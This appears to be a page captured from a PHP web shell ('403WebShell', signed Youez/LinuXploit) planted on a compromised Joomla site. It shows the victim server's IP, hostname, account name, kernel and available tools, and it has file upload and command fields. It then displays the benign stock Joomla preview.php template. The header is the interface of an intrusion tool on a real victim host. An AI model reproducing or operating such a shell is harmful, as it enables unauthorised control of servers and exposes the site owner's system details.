Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/zenit/administrator/components/com_contenthistory/tmpl/preview/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/zenit/administrator/components/com_contenthistory/tmpl/preview/preview.php
<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_contenthistory
 *
 * @copyright   (C) 2013 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Language\Text;
use Joomla\CMS\Session\Session;

Session::checkToken('get') or die(Text::_('JINVALID_TOKEN'));

?>
<div role="main">
	<h1>
		<?php echo Text::sprintf('COM_CONTENTHISTORY_PREVIEW_SUBTITLE_DATE', $this->item->save_date); ?>
	</h1>
	<?php if ($this->item->version_note) : ?>
		<h2>
			<?php echo Text::sprintf('COM_CONTENTHISTORY_PREVIEW_SUBTITLE', $this->item->version_note); ?>
		</h2>
	<?php endif; ?>

	<table class="table">
		<caption class="visually-hidden">
			<?php echo Text::_('COM_CONTENTHISTORY_PREVIEW_CAPTION'); ?>
		</caption>
		<thead>
			<tr>
				<th class="w-25" scope="col"><?php echo Text::_('COM_CONTENTHISTORY_PREVIEW_FIELD'); ?></th>
				<th scope="col"><?php echo Text::_('COM_CONTENTHISTORY_PREVIEW_VALUE'); ?></th>
			</tr>
		</thead>
		<tbody>
		<?php foreach ($this->item->data as $name => $value) : ?>
			<?php if (is_object($value->value)) : ?>
				<tr>
					<td colspan="2">
						<?php echo $value->label; ?>
					</td>
				</tr>
				<?php foreach ($value->value as $subName => $subValue) : ?>
					<?php if ($subValue) : ?>
						<tr>
							<th scope="row"><em>&nbsp;&nbsp;<?php echo $subValue->label; ?></em></th>
							<td><?php echo $subValue->value; ?></td>
						</tr>
					<?php endif; ?>
				<?php endforeach; ?>
			<?php else : ?>
				<tr>
					<th scope="row"><?php echo $value->label; ?></th>
					<td><?php echo $value->value; ?></td>
				</tr>
			<?php endif; ?>
		<?php endforeach; ?>
		</tbody>
	</table>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit